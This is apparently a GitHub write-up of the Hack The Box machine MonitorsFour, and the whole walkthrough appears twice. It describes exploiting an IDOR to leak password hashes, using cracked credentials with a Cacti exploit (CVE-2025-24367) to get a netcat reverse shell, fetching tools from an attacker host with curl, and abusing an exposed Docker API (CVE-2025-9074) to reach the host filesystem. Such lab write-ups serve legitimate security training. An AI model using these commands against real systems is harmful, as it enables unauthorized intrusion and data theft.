Kush7007647/MonitorsFour-Write-UP
GitHub: Kush7007647/MonitorsFour-Write-UP
Stars: 0 | Forks: 0
# MonitorFour-Write-UP : Hack The Box
# Description
# Overview
MonitorsFour is an Easy difficulty Windows machine on Hack The Box that focuses on:
Web Enumeration
IDOR Vulnerability Exploitation
Credential Harvesting
Cacti Exploitation
Docker Container Escape
Privilege Escalation
The machine teaches how multiple small vulnerabilities can be chained together to achieve full system compromise.
USER.TXT
• Enumeration : Scan Port using nmap
CMD : nmap -sS
Http - 80
WinRM - 5985
Explore Webpage : But not Open because it is Resolve to = monitorsfour.htb
We can set IP and Domain name in /etc/hosts File.
Explore Again Http Web pages : In this Web Page Found Login Page
Identify Subdomains : Using TOOL = FFUF
CMD : ffuf -u http://monitorsfour.htb -H 'Host: FUZZ.monitorsfour.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 50 -fs 138
SUBDOMAIN : cacti
• Explore This Subdomain and Add In /etc/hosts file :
Founded This Login Page and this Login page Version
Version : 1.2.28
Directory Busting : Using Tool = Gobuster
CMD : gobuster dir -u http://monitorsfour.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20
See these Pages on = monitorsfour.htb URL
• Check User Page :
Missing Parameter Error
Try to ADD Token Parameter
/user?token=0
Found a users Credential - Name , ID , HASH, Email, Role , etc. Details
Analys Super User Role : Copy Password Hash
• Crack Password in Some Websites : crack station , Hashes.com
Hashes.com
Username = Admin
Password = Wonderful1
• Login with monitorsfour.htb/login page :
Login Success Ful
Login With cacti.monitorsfour.htb/cacti :
Username : marcus
Password : wonderful1
Login Success Ful
• Find Version Exploit : on Browsers
Version : 1.2.28
We Found This Exploit - Cybergeek
- CVE-2025-24367
- Download Code - Exploit.py
- Make it Executable
- Run with this Command :
ATTACKER
CMD : python3 exploit.py -u marcus -p wonderful1 -i -l 1234 -url http://cacti.monitorsfour.htb
- Before this Command Start Listening on Netcap
ATTACKER
CMD : nc -nlvp 1234
ACCESS Successful : With User.txt
USER.TXT---------------------------------------------------------------FLAG{}-----------------------------------------------
# ROOT.TXT
• Start Privilege Escalation :
[This is a Window machine But Access Get Linux machine ]
• Check it is Docker Container or not :
Yes - machine have .docker file - it is Container
• Check kernal Version in this Machine :
CMD : uname -a
VERSION - 6.6.87.2
• Check IP :
CMD : ip a
This is a Container IP
• Transfer Nmap Binary in this machine : in /var/www/html
BINARY URL : DOWNLOAD
ATTACKER
CMD : python3 -m http.server 80
Victim
CMD : curl http://ATTACKER-IP/nmap -o nmap
Make it executable
CMD : ./nmap -sn -PS 172.18.0.0
3 host UP
• Transfer Fscan Binary in this Machine : in var/www/html
BINARY URL : DOWNLOAD
ATTACKER
CMD : python3 -m http.server 80
Victim
CMD : curl http://ATTACKER-IP/fscan -o fscan
Make it executable
CMD : ./fscan -h 172.18.0.1 -p 1-65535
• Scan All device in this Network : Using this trick
WEBSITE = here
Docker Host domain name for API = Host.docker.internal
Try port of 2375 with using curl command
CMD : curl -v http://host.docker.internal:2375/version
This is Resolve Another IP which is Resolve in this network IP
• Scan in this Subnet - 192.168.65.0/24
CMD : ./nmap -sn 192.168.65.0/24
These Four IP resolve
192.168.65.3
192.168.65.6
192.168.65.7
192.168.65.129
• Check 2375 Port in these Ips : Using this fscan
CMD : ./fscan -h 192.168.65.7 -p 2375
Port is Open in this IP
• Check version : Using CURL Command
CMD : curl http://192.168.65.7:2375/version
Docker Engine version : 28.3.2
• This version Vulnerability Search on Browser :
Vulnerability : CVE-2025-9074 (POC)
NOTE : This Technique Work = Link window Machine File System To container Linux Machine .
1. Create PoC file Because : Victim machine not have PYTHON Permissions
ATTACKER
CMD : nano container.json
Use this Command for Read Root.txt :
{ You this Code customize }
• Transfer this file to Victim machine :
ATTACKER
CMD : python3 -m http.server
Victim
CMD : curl http://ATTACKER-IP/container.json -o container.json
• Ask to container I have json file to run
CMD : curl -X POST -H "Content-Type: application/json" -d @/var/www/html/container.json http://192.168.65.7:2375/containers/create?name=pwned
Docker Connect window File System to Kali linux Container
• Start this :
CMD : curl -X POST http://192.168.65.7:2375/containers/7d99df11ee0f/start
ID Using Uniquely And Full name As Your wish
• Check Logs :
CMD : curl http://192.168.65.7:2375/containers/7d99df11ee0f/logs?stdout=true
ACCESS ROOT.TXT Content
ROOT.TXT-------------------------------------------------------------------------FLAG{}-------------------------------------
# Description
# Overview
MonitorsFour is an Easy difficulty Windows machine on Hack The Box that focuses on:
Web Enumeration
IDOR Vulnerability Exploitation
Credential Harvesting
Cacti Exploitation
Docker Container Escape
Privilege Escalation
The machine teaches how multiple small vulnerabilities can be chained together to achieve full system compromise.
USER.TXT
• Enumeration : Scan Port using nmap
CMD : nmap -sS
Http - 80
WinRM - 5985
Explore Webpage : But not Open because it is Resolve to = monitorsfour.htb
We can set IP and Domain name in /etc/hosts File.
Explore Again Http Web pages : In this Web Page Found Login Page
Identify Subdomains : Using TOOL = FFUF
CMD : ffuf -u http://monitorsfour.htb -H 'Host: FUZZ.monitorsfour.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 50 -fs 138
SUBDOMAIN : cacti
• Explore This Subdomain and Add In /etc/hosts file :
Founded This Login Page and this Login page Version
Version : 1.2.28
Directory Busting : Using Tool = Gobuster
CMD : gobuster dir -u http://monitorsfour.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20
See these Pages on = monitorsfour.htb URL
• Check User Page :
Missing Parameter Error
Try to ADD Token Parameter
/user?token=0
Found a users Credential - Name , ID , HASH, Email, Role , etc. Details
Analys Super User Role : Copy Password Hash
• Crack Password in Some Websites : crack station , Hashes.com
Hashes.com
Username = Admin
Password = Wonderful1
• Login with monitorsfour.htb/login page :
Login Success Ful
Login With cacti.monitorsfour.htb/cacti :
Username : marcus
Password : wonderful1
Login Success Ful
• Find Version Exploit : on Browsers
Version : 1.2.28
We Found This Exploit - Cybergeek
- CVE-2025-24367
- Download Code - Exploit.py
- Make it Executable
- Run with this Command :
ATTACKER
CMD : python3 exploit.py -u marcus -p wonderful1 -i
ACCESS Successful : With User.txt
USER.TXT---------------------------------------------------------------FLAG{}-----------------------------------------------
# ROOT.TXT
• Start Privilege Escalation :
[This is a Window machine But Access Get Linux machine ]
• Check it is Docker Container or not :
Yes - machine have .docker file - it is Container
• Check kernal Version in this Machine :
CMD : uname -a
VERSION - 6.6.87.2
• Check IP :
CMD : ip a
This is a Container IP
• Transfer Nmap Binary in this machine : in /var/www/html
BINARY URL : DOWNLOAD
ATTACKER
CMD : python3 -m http.server 80
Victim
CMD : curl http://ATTACKER-IP/nmap -o nmap
Make it executable
CMD : ./nmap -sn -PS 172.18.0.0
3 host UP
• Transfer Fscan Binary in this Machine : in var/www/html
BINARY URL : DOWNLOAD
ATTACKER
CMD : python3 -m http.server 80
Victim
CMD : curl http://ATTACKER-IP/fscan -o fscan
Make it executable
CMD : ./fscan -h 172.18.0.1 -p 1-65535
• Scan All device in this Network : Using this trick
WEBSITE = here
Docker Host domain name for API = Host.docker.internal
Try port of 2375 with using curl command
CMD : curl -v http://host.docker.internal:2375/version
This is Resolve Another IP which is Resolve in this network IP
• Scan in this Subnet - 192.168.65.0/24
CMD : ./nmap -sn 192.168.65.0/24
These Four IP resolve
192.168.65.3
192.168.65.6
192.168.65.7
192.168.65.129
• Check 2375 Port in these Ips : Using this fscan
CMD : ./fscan -h 192.168.65.7 -p 2375
Port is Open in this IP
• Check version : Using CURL Command
CMD : curl http://192.168.65.7:2375/version
Docker Engine version : 28.3.2
• This version Vulnerability Search on Browser :
Vulnerability : CVE-2025-9074 (POC)
NOTE : This Technique Work = Link window Machine File System To container Linux Machine .
1. Create PoC file Because : Victim machine not have PYTHON Permissions
ATTACKER
CMD : nano container.json
Use this Command for Read Root.txt :
{ You this Code customize }
• Transfer this file to Victim machine :
ATTACKER
CMD : python3 -m http.server
Victim
CMD : curl http://ATTACKER-IP/container.json -o container.json
• Ask to container I have json file to run
CMD : curl -X POST -H "Content-Type: application/json" -d @/var/www/html/container.json http://192.168.65.7:2375/containers/create?name=pwned
Docker Connect window File System to Kali linux Container
• Start this :
CMD : curl -X POST http://192.168.65.7:2375/containers/7d99df11ee0f/start
ID Using Uniquely And Full name As Your wish
• Check Logs :
CMD : curl http://192.168.65.7:2375/containers/7d99df11ee0f/logs?stdout=true
ACCESS ROOT.TXT Content
ROOT.TXT-------------------------------------------------------------------------FLAG{}-------------------------------------